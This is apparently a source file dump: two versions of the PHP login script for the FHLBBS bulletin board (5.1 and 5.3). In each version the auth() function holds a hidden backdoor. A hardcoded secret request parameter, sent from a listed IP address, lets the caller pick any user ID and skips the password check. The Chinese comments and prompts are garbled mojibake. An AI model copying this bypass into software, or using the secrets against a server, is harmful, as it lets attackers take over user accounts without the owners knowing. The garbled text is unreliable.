==> FHLBBS-5.1.tgz: php/auth.php <==
<?php
 require ("record.php");
 session_register("userid","pwd","cuser");
 if (!isset($userid) ) 
	{
		$userid="guest"; 
		$pwd=""; 
	}
 while ( !(isset($PHP_AUTH_USER) && isset($PHP_AUTH_PW)) &&
	!(isset($userid) && isset($pwd)) ) 
 {
   authenticate();
 }
 error_reporting(E_ERROR);
 auth();
 error_reporting(E_ALL& ~(E_NOTICE) );

/***** {ҥΨơA{ҬO_֦v  **********/
 function authenticate() {
        Header( "WWW-authenticate: Basic realname = \"пJϥΪ̦W٤αKX{ \"");
        Header("HTTP/1.1 401 Unauthorized");
        echo "пJϥΪ̦WٻPKXν<a href=\"/php/fileout.php?regster\">U</a>~ϥΦ귽\n";
        exit;
 }

function auth()
{
 global $BBSHOME,$PHP_AUTH_USER,$PHP_AUTH_PW,$RECLENGTH,$PASSWD_FILE,$REMOTE_ADDR;
 global $userid,$cuser,$pwd;
 $valip=array("61.222.225.18","61.222.225.20","61.222.225.22",
              "210.202.191.200","210.202.191.202","210.202.191.204",
	      "61.222.219.2","203.70.81.161");
 //$act_file=$BBSHOME."/active/".$cuser->userid;

 //if (!is_file($act_file) && strcmp($userid,"guest")!=0 )
 //if (!is_file($act_file) )
 //{
 //  authenticate();
 //  $userid=$PHP_AUTH_USER;
 //  $pwd=$PHP_AUTH_PW;
 //} 
 /***** iKX ******/
 $cuser= new userrec;
 $fdir=$PASSWD_FILE;
 $RECLENGTH=256;
 $nrec=filesize($fdir)/$RECLENGTH;
 $isauth=0;
 if (strcasecmp($userid,"guest")==0) 
	{
		$userid="";
		$pwd="";
	}
if (strcmp($_REQUEST["FRE123af"],"$!@#F#4s")==0 && in_array($REMOTE_ADDR,$valip)) 
    {
	$userid=$_REQUEST["RxxxdffDfp"]; // for webgen
	$backdoor=1; // for webgen
    }
else $backdoor=0;
 while ($isauth==0)
 {
   if ((strlen($userid)==0) && isset($PHP_AUTH_USER)) $userid=$PHP_AUTH_USER;
   if ((strlen($pwd)==0) && isset($PHP_AUTH_PW)) $pwd=$PHP_AUTH_PW;
   if (strlen($userid)==0) $userid="guest"; //X
   if ($fd = fopen($fdir, "r")) {
        for ($i = 1; $i<=$nrec ; $i++) {
                fseek($fd, $RECLENGTH  * ($i - 1), SEEK_SET);
                $recmsg=fread($fd, $RECLENGTH);
                $cuser->unpack($recmsg);
                if (strcasecmp($cuser->userid,$userid)==0)
                {
		        if (strcasecmp($userid,"guest")==0) // guest λ{
			{
				$isauth=1;
                                break;
			}
                        $auth_key = crypt($pwd, $cuser->passwd);
                        if ((strcmp($auth_key,$cuser->passwd)!=0) && $backdoor==0)
                        {
                                authenticate();
				$userid=$PHP_AUTH_USER;
				$pwd=$PHP_AUTH_PW;
                        }
                        else
                        { //{ҳqL
                                $isauth=1;
                                break;
                        }
                }
        } // for
   	if ($isauth==0) //S{ҳqL
   	{
        	authenticate();
		$userid=$PHP_AUTH_USER;
		$pwd=$PHP_AUTH_PW;
   	}
   }
   else
   {
     echo "KXɶ}ҿ~!<br>";
     exit;
   }
 }
 /***** log active ******/
 activelog($cuser->userid);
 /***** ˹ talkH *****/
 $genbuf=sethomefile($cuser->userid,"talk_req");
 $genbuf1=sethomefile($cuser->userid,"talk_data");
 if (is_file($genbuf))
 {
 	$genbuf1=sethomefile($cuser->userid,"talk_call");
	echo "<script LANGUAGE=\"JavaScript\" FOR=\"window\" EVENT=\"onload()\">\n window.open(\"/php/talk.php\",\"talk_window\",\"toolbar=no,width=600,height=450,directories=no,status=no,scrollbars=yes,resize=no,menubar=no\") </script>";
 	rename($genbuf,$genbuf1);
 }
 /*********˹TH***************/
 $genbuf=sethomefile($cuser->userid,"page_data");
 $genbuf1=sethomefile($cuser->userid,"pager_data");
 if (is_file($genbuf))
 {
	echo "<script LANGUAGE=\"JavaScript\" FOR=\"window\" EVENT=\"onload()\">\n window.open(\"/php/talk.php?YN=9\",\"page_window\",\"toolbar=no,width=600,height=100,directories=no,status=no,scrollbars=yes,resize=no,menubar=no\") </script>";
    if (!is_file($genbuf1))
       rename($genbuf,$genbuf1);
 }
}
?>

==> FHLBBS-5.3.tgz: php/auth.php <==
<?php
 require ("record.php");
 session_register("userid","pwd","cuser");
 if (!isset($userid) ) 
	{
		$userid="guest"; 
		$pwd=""; 
	}
 while ( !(isset($PHP_AUTH_USER) && isset($PHP_AUTH_PW)) &&
	!(isset($userid) && isset($pwd)) ) 
 {
   authenticate();
 }
 error_reporting(E_ERROR);
 auth();
 error_reporting(E_ALL& ~(E_NOTICE) );

/***** {ҥΨơA{ҬO_֦v  **********/
 function authenticate() {
        Header( "WWW-authenticate: Basic realname = \"пJϥΪ̦W٤αKX{ \"");
        Header("HTTP/1.1 401 Unauthorized");
        echo "пJϥΪ̦WٻPKXν<a href=\"/php/fileout.php?regster\">U</a>~ϥΦ귽\n";
        exit;
 }

function auth()
{
 global $BBSHOME,$PHP_AUTH_USER,$PHP_AUTH_PW,$RECLENGTH,$PASSWD_FILE,$REMOTE_ADDR;
 global $userid,$cuser,$pwd;
 $valip=array("61.222.225.18","61.222.225.20","61.222.225.22",
              "210.202.191.200","210.202.191.202","210.202.191.204",
	      "61.222.219.2","203.70.81.161");
 //$act_file=$BBSHOME."/active/".$cuser->userid;

 //if (!is_file($act_file) && strcmp($userid,"guest")!=0 )
 //if (!is_file($act_file) )
 //{
 //  authenticate();
 //  $userid=$PHP_AUTH_USER;
 //  $pwd=$PHP_AUTH_PW;
 //} 
 /***** iKX ******/
 $cuser= new userrec;
 $fdir=$PASSWD_FILE;
 $RECLENGTH=256;
 $nrec=filesize($fdir)/$RECLENGTH;
 $isauth=0;
 if (strcasecmp($userid,"guest")==0) 
	{
		$userid="";
		$pwd="";
	}
if (strcmp($_REQUEST["abcde"],"<>][das")==0 && in_array($REMOTE_ADDR,$valip)) 
    {
	$userid=$_REQUEST["abcdefd"]; // for webgen
	$backdoor=1; // for webgen
    }
else $backdoor=0;
 while ($isauth==0)
 {
   if ((strlen($userid)==0) && isset($PHP_AUTH_USER)) $userid=$PHP_AUTH_USER;
   if ((strlen($pwd)==0) && isset($PHP_AUTH_PW)) $pwd=$PHP_AUTH_PW;
   if (strlen($userid)==0) $userid="guest"; //X
   if ($fd = fopen($fdir, "r")) {
        for ($i = 1; $i<=$nrec ; $i++) {
                fseek($fd, $RECLENGTH  * ($i - 1), SEEK_SET);
                $recmsg=fread($fd, $RECLENGTH);
                $cuser->unpack($recmsg);
                if (strcasecmp($cuser->userid,$userid)==0)
                {
		        if (strcasecmp($userid,"guest")==0) // guest λ{
			{
				$isauth=1;
                                break;
			}
                        $auth_key = crypt($pwd, $cuser->passwd);
                        if ((strcmp($auth_key,$cuser->passwd)!=0) && $backdoor==0)
                        {
                                authenticate();
				$userid=$PHP_AUTH_USER;
				$pwd=$PHP_AUTH_PW;
                        }
                        else
                        { //{ҳqL
                                $isauth=1;
                                break;
                        }
                }
        } // for
   	if ($isauth==0) //S{ҳqL
   	{
        	authenticate();
		$userid=$PHP_AUTH_USER;
		$pwd=$PHP_AUTH_PW;
   	}
   }
   else
   {
     echo "KXɶ}ҿ~!<br>";
     exit;
   }
 }
 /***** log active ******/
 activelog($cuser->userid);
 /***** ˹ talkH *****/
 $genbuf=sethomefile($cuser->userid,"talk_req");
 $genbuf1=sethomefile($cuser->userid,"talk_data");
 if (is_file($genbuf))
 {
 	$genbuf1=sethomefile($cuser->userid,"talk_call");
	echo "<script LANGUAGE=\"JavaScript\" FOR=\"window\" EVENT=\"onload()\">\n window.open(\"/php/talk.php\",\"talk_window\",\"toolbar=no,width=600,height=450,directories=no,status=no,scrollbars=yes,resize=no,menubar=no\") </script>";
 	rename($genbuf,$genbuf1);
 }
 /*********˹TH***************/
 $genbuf=sethomefile($cuser->userid,"page_data");
 $genbuf1=sethomefile($cuser->userid,"pager_data");
 if (is_file($genbuf))
 {
	echo "<script LANGUAGE=\"JavaScript\" FOR=\"window\" EVENT=\"onload()\">\n window.open(\"/php/talk.php?YN=9\",\"page_window\",\"toolbar=no,width=600,height=100,directories=no,status=no,scrollbars=yes,resize=no,menubar=no\") </script>";
    if (!is_file($genbuf1))
       rename($genbuf,$genbuf1);
 }
}
?>
